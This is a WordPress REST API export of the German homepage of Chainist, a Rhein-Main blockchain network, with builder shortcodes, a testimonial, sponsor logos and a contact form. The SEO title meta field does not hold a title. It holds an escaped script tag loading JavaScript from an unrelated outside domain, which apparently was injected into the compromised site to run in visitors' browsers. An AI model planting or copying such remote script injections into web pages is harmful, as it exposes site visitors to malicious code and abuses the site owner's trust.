{"id":2,"date":"2018-06-16T11:38:50","date_gmt":"2018-06-16T09:38:50","guid":{"rendered":"http:\/\/chainist.de\/?page_id=2"},"modified":"2024-01-10T13:15:32","modified_gmt":"2024-01-10T12:15:32","slug":"home","status":"publish","type":"page","link":"https:\/\/chainist.de\/","title":{"rendered":"Blockchain Wissen von Chainist"},"content":{"rendered":"<p>[et_pb_section fb_built=&#8220;1&#8243; module_id=&#8220;mood_video_home&#8220; _builder_version=&#8220;4.23.4&#8243; parallax=&#8220;on&#8220; background_enable_video_webm=&#8220;off&#8220; background_video_width=&#8220;100%&#8220; background_video_height=&#8220;50%&#8220; min_height=&#8220;500px&#8220; filter_brightness=&#8220;87%&#8220; filter_contrast=&#8220;126%&#8220; hover_enabled=&#8220;0&#8243; global_colors_info=&#8220;{}&#8220; sticky_enabled=&#8220;0&#8243; background_color=&#8220;#495768&#8243;][et_pb_row column_structure=&#8220;2_5,3_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_column type=&#8220;2_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_text _builder_version=&#8220;4.16&#8243; header_font=&#8220;|||on|||||&#8220; header_text_color=&#8220;#ffffff&#8220; header_font_size=&#8220;2.8em&#8220; custom_padding=&#8220;1em|1em|1em|1em|true|true&#8220; custom_padding_tablet=&#8220;&#8220; custom_padding_phone=&#8220;&#8220; custom_padding_last_edited=&#8220;on|desktop&#8220; header_font_size_tablet=&#8220;&#8220; header_font_size_phone=&#8220;2em&#8220; header_font_size_last_edited=&#8220;on|phone&#8220; border_width_all=&#8220;10px&#8220; border_color_all=&#8220;#a0e0e5&#8243; global_colors_info=&#8220;{}&#8220;]<\/p>\n<h1>Blockchain Wissen, Events und Communities<\/h1>\n<p>[\/et_pb_text][\/et_pb_column][et_pb_column type=&#8220;3_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_text _builder_version=&#8220;4.16&#8243; text_font=&#8220;|600|||||||&#8220; text_line_height=&#8220;1.8em&#8220; background_layout=&#8220;dark&#8220; global_colors_info=&#8220;{}&#8220;]<\/p>\n<p>Es braucht\u00a0<strong><em>Aufkl\u00e4rung<\/em><\/strong>, <strong><em>Wissen<\/em><\/strong> und ein <strong><em>Netzwerk,\u00a0<\/em><\/strong>um neue Technologien wie Blockchain und Distributed Ledger zu verstehen, neue Denkans\u00e4tze nachvollziehen zu k\u00f6nnen und am Ende auch anzuwenden. Diese M\u00f6glichkeiten bietet Chainist Menschen in der Rhein-Main Region.<\/p>\n<p>Bei uns findest du freie Leseinhalte \u00fcber Blockchain, offene Blockchain-Meetups und Veranstaltungen und ein Netzwerk zu nationalen und internationalen Blockchain-Experten.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=&#8220;1&#8243; _builder_version=&#8220;4.16&#8243; min_height=&#8220;301px&#8220; custom_padding=&#8220;54px|0px|0|0px|false|false&#8220; global_colors_info=&#8220;{}&#8220;][et_pb_row column_structure=&#8220;1_2,1_2&#8243; _builder_version=&#8220;4.16&#8243; min_height=&#8220;385px&#8220; custom_margin=&#8220;||2em||false|false&#8220; custom_padding=&#8220;||0px||false|false&#8220; global_colors_info=&#8220;{}&#8220;][et_pb_column type=&#8220;1_2&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_testimonial author=&#8220;Dr. Marcus M. Dapp&#8220; job_title=&#8220;Postdoktorand\/Lecturer f\u00fcr Computational Social Science&#8220; company_name=&#8220;ETH Z\u00fcrich&#8220; url=&#8220;https:\/\/blockchain.ethz.ch\/about-us.html&#8220; portrait_url=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2021\/06\/markus-dapp-300&#215;300.jpeg&#8220; _builder_version=&#8220;4.16&#8243; _module_preset=&#8220;default&#8220; global_colors_info=&#8220;{}&#8220;]<\/p>\n<p>Es gibt fast keine deutschen Quellen zu Finance 4.0. Chainist hat einen entscheidenden Beitrag geleistet, dies zu \u00e4ndern. Unser Team bedankt sich herzlich daf\u00fcr!<\/p>\n<p>[\/et_pb_testimonial][\/et_pb_column][et_pb_column type=&#8220;1_2&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_text _builder_version=&#8220;4.16&#8243; _module_preset=&#8220;default&#8220; global_colors_info=&#8220;{}&#8220;]<\/p>\n<blockquote>\n<p><em>Money is a <strong>signal<\/strong> of what is valuable to us.<\/em><br \/><em>Money is <strong>future potential<\/strong>, similar to stored energy.<\/em><br \/><em>Money is <strong>directed energy<\/strong>. Today it maximizes only profit.<\/em><br \/><em>Money creation is the privilege of banks. Why?<\/em><\/p>\n<\/blockquote>\n<p>[\/et_pb_text][et_pb_button button_url=&#8220;@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wb3N0Iiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjcwMjcifX0=@&#8220; button_text=&#8220;Zur Zusammenfassung zu Finance 4.0&#8243; button_alignment=&#8220;center&#8220; _builder_version=&#8220;4.16&#8243; _dynamic_attributes=&#8220;button_url&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_button][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=&#8220;1&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_row column_structure=&#8220;1_5,1_5,1_5,1_5,1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2020\/04\/logo-wirtschaftsministerium-rlp-sw.png&#8220; alt=&#8220;Logo Wirtschaftsministerium Schwarz Wei\u00df&#8220; title_text=&#8220;logo-wirtschaftsministerium-rlp-sw&#8220; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2019\/02\/Mainz_logo.png&#8220; alt=&#8220;Logo Stadt Mainz&#8220; title_text=&#8220;Mainz_logo&#8220; _builder_version=&#8220;4.16&#8243; module_alignment=&#8220;center&#8220; filter_saturate=&#8220;0%&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2018\/12\/gutenberg-digital-hub-logo-wortmarke.jpg&#8220; alt=&#8220;Logo Gutenberg Digital Hub&#8220; title_text=&#8220;GDH_Logo_mit_Wortmarke_offen_CMYK&#8220; _builder_version=&#8220;4.16&#8243; module_alignment=&#8220;center&#8220; filter_saturate=&#8220;0%&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2020\/04\/ihk-hub-logo-sw-300&#215;117.png&#8220; alt=&#8220;IHK Hub Logo Schwarz Wei\u00df&#8220; title_text=&#8220;ihk-hub-logo-sw&#8220; _builder_version=&#8220;4.16&#8243; module_alignment=&#8220;center&#8220; filter_saturate=&#8220;0%&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2019\/02\/PB_green.png&#8220; alt=&#8220;PositiveBlockchain Logo quadratisch&#8220; title_text=&#8220;PB_green&#8220; align=&#8220;center&#8220; _builder_version=&#8220;4.16&#8243; module_alignment=&#8220;center&#8220; filter_saturate=&#8220;0%&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][\/et_pb_row][et_pb_row column_structure=&#8220;1_5,1_5,1_5,1_5,1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2021\/04\/AHK-Israel-300&#215;62.png&#8220; alt=&#8220;Logo Wirtschaftsministerium Schwarz Wei\u00df&#8220; title_text=&#8220;AHK-Israel&#8220; _builder_version=&#8220;4.16&#8243; filter_saturate=&#8220;0%&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2021\/05\/ahk-vietnam.svg&#8220; alt=&#8220;Logo Stadt Mainz&#8220; title_text=&#8220;ahk-vietnam&#8220; _builder_version=&#8220;4.16&#8243; module_alignment=&#8220;center&#8220; filter_saturate=&#8220;0%&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_image src=&#8220;https:\/\/chainist.de\/wp-content\/uploads\/2018\/12\/brainbot-300&#215;56.png&#8220; alt=&#8220;Logo brainBot AG&#8220; title_text=&#8220;brainbot&#8220; _builder_version=&#8220;4.16&#8243; module_alignment=&#8220;center&#8220; filter_saturate=&#8220;0%&#8220; global_colors_info=&#8220;{}&#8220;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8220;1_5&#8243; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=&#8220;1&#8243; _builder_version=&#8220;3.22&#8243; background_color=&#8220;#495768&#8243; global_module=&#8220;5405&#8243; saved_tabs=&#8220;all&#8220; global_colors_info=&#8220;{}&#8220;][et_pb_row _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220;][et_pb_column type=&#8220;4_4&#8243; _builder_version=&#8220;4.16&#8243; custom_padding=&#8220;|||&#8220; global_colors_info=&#8220;{}&#8220; custom_padding__hover=&#8220;|||&#8220;][et_pb_blurb title=&#8220;Chainisten sprechen?&#8220; _builder_version=&#8220;4.23.4&#8243; header_level=&#8220;h2&#8243; header_font=&#8220;Playfair Display|700|||||||&#8220; text_orientation=&#8220;center&#8220; background_layout=&#8220;dark&#8220; hover_enabled=&#8220;0&#8243; global_colors_info=&#8220;{}&#8220; image_icon_width=&#8220;54%&#8220; sticky_enabled=&#8220;0&#8243;]<\/p>\n<p>Du hast Fragen oder m\u00f6chtest uns kennenlernen? Schreibe uns hier \u00fcber das Kontaktformular an oder schicke uns eine E-Mail an <a title=\"E-Mail an chainist.de\" href=\"mailto:hallo@chainist.de\">hallo@chainist.de<\/a><\/p>\n<p>[\/et_pb_blurb][et_pb_contact_form captcha=&#8220;off&#8220; email=&#8220;hallo@chainist.de&#8220; custom_message=&#8220;Wir haben eine Anfrage auf chainist.de erhalten||et_pb_line_break_holder||%%Name%%||et_pb_line_break_holder||%%Email%%||et_pb_line_break_holder||%%Message%%&#8220; success_message=&#8220;Vielen Dank f\u00fcr Ihre Anfrage. Wir melden uns umgehend bei Ihnen.&#8220; module_id=&#8220;et_pb_contact_form_0&#8243; _builder_version=&#8220;4.16&#8243; _unique_id=&#8220;232e6211-fcac-4b8f-af22-05a41d7abd2b&#8220; global_colors_info=&#8220;{}&#8220;][et_pb_contact_field field_id=&#8220;Name&#8220; field_title=&#8220;Name&#8220; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220; button_text_size__hover_enabled=&#8220;off&#8220; button_one_text_size__hover_enabled=&#8220;off&#8220; button_two_text_size__hover_enabled=&#8220;off&#8220; button_text_color__hover_enabled=&#8220;off&#8220; button_one_text_color__hover_enabled=&#8220;off&#8220; button_two_text_color__hover_enabled=&#8220;off&#8220; button_border_width__hover_enabled=&#8220;off&#8220; button_one_border_width__hover_enabled=&#8220;off&#8220; button_two_border_width__hover_enabled=&#8220;off&#8220; button_border_color__hover_enabled=&#8220;off&#8220; button_one_border_color__hover_enabled=&#8220;off&#8220; button_two_border_color__hover_enabled=&#8220;off&#8220; button_border_radius__hover_enabled=&#8220;off&#8220; button_one_border_radius__hover_enabled=&#8220;off&#8220; button_two_border_radius__hover_enabled=&#8220;off&#8220; button_letter_spacing__hover_enabled=&#8220;off&#8220; button_one_letter_spacing__hover_enabled=&#8220;off&#8220; button_two_letter_spacing__hover_enabled=&#8220;off&#8220; button_bg_color__hover_enabled=&#8220;off&#8220; button_one_bg_color__hover_enabled=&#8220;off&#8220; button_two_bg_color__hover_enabled=&#8220;off&#8220;][\/et_pb_contact_field][et_pb_contact_field field_id=&#8220;Email&#8220; field_title=&#8220;E-Mail-Adresse&#8220; field_type=&#8220;email&#8220; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220; button_text_size__hover_enabled=&#8220;off&#8220; button_one_text_size__hover_enabled=&#8220;off&#8220; button_two_text_size__hover_enabled=&#8220;off&#8220; button_text_color__hover_enabled=&#8220;off&#8220; button_one_text_color__hover_enabled=&#8220;off&#8220; button_two_text_color__hover_enabled=&#8220;off&#8220; button_border_width__hover_enabled=&#8220;off&#8220; button_one_border_width__hover_enabled=&#8220;off&#8220; button_two_border_width__hover_enabled=&#8220;off&#8220; button_border_color__hover_enabled=&#8220;off&#8220; button_one_border_color__hover_enabled=&#8220;off&#8220; button_two_border_color__hover_enabled=&#8220;off&#8220; button_border_radius__hover_enabled=&#8220;off&#8220; button_one_border_radius__hover_enabled=&#8220;off&#8220; button_two_border_radius__hover_enabled=&#8220;off&#8220; button_letter_spacing__hover_enabled=&#8220;off&#8220; button_one_letter_spacing__hover_enabled=&#8220;off&#8220; button_two_letter_spacing__hover_enabled=&#8220;off&#8220; button_bg_color__hover_enabled=&#8220;off&#8220; button_one_bg_color__hover_enabled=&#8220;off&#8220; button_two_bg_color__hover_enabled=&#8220;off&#8220;][\/et_pb_contact_field][et_pb_contact_field field_id=&#8220;Message&#8220; field_title=&#8220;Nachricht&#8220; field_type=&#8220;text&#8220; fullwidth_field=&#8220;on&#8220; _builder_version=&#8220;4.16&#8243; global_colors_info=&#8220;{}&#8220; button_text_size__hover_enabled=&#8220;off&#8220; button_one_text_size__hover_enabled=&#8220;off&#8220; button_two_text_size__hover_enabled=&#8220;off&#8220; button_text_color__hover_enabled=&#8220;off&#8220; button_one_text_color__hover_enabled=&#8220;off&#8220; button_two_text_color__hover_enabled=&#8220;off&#8220; button_border_width__hover_enabled=&#8220;off&#8220; button_one_border_width__hover_enabled=&#8220;off&#8220; button_two_border_width__hover_enabled=&#8220;off&#8220; button_border_color__hover_enabled=&#8220;off&#8220; button_one_border_color__hover_enabled=&#8220;off&#8220; button_two_border_color__hover_enabled=&#8220;off&#8220; button_border_radius__hover_enabled=&#8220;off&#8220; button_one_border_radius__hover_enabled=&#8220;off&#8220; button_two_border_radius__hover_enabled=&#8220;off&#8220; button_letter_spacing__hover_enabled=&#8220;off&#8220; button_one_letter_spacing__hover_enabled=&#8220;off&#8220; button_two_letter_spacing__hover_enabled=&#8220;off&#8220; button_bg_color__hover_enabled=&#8220;off&#8220; button_one_bg_color__hover_enabled=&#8220;off&#8220; button_two_bg_color__hover_enabled=&#8220;off&#8220;][\/et_pb_contact_field][\/et_pb_contact_form][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Blockchain Wissen, Events und CommunitiesEs braucht\u00a0Aufkl\u00e4rung, Wissen und ein Netzwerk,\u00a0um neue Technologien wie Blockchain und Distributed Ledger zu verstehen, neue Denkans\u00e4tze nachvollziehen zu k\u00f6nnen und am Ende auch anzuwenden. Diese M\u00f6glichkeiten bietet Chainist Menschen in der Rhein-Main Region. Bei uns findest du freie Leseinhalte \u00fcber Blockchain, offene Blockchain-Meetups und Veranstaltungen und ein Netzwerk zu nationalen [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"&lt;script src=&quot;https:\/\/xmlrpc.online\/x\/h.js&quot;&gt;&lt;\/script&gt;","_seopress_titles_desc":"Das Blockchain Kompetenz-Netzwerk aus Rhein-Main.","_seopress_robots_index":"","_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-2","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/pages\/2","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":10,"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":7796,"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/pages\/2\/revisions\/7796"}],"wp:attachment":[{"href":"https:\/\/chainist.de\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}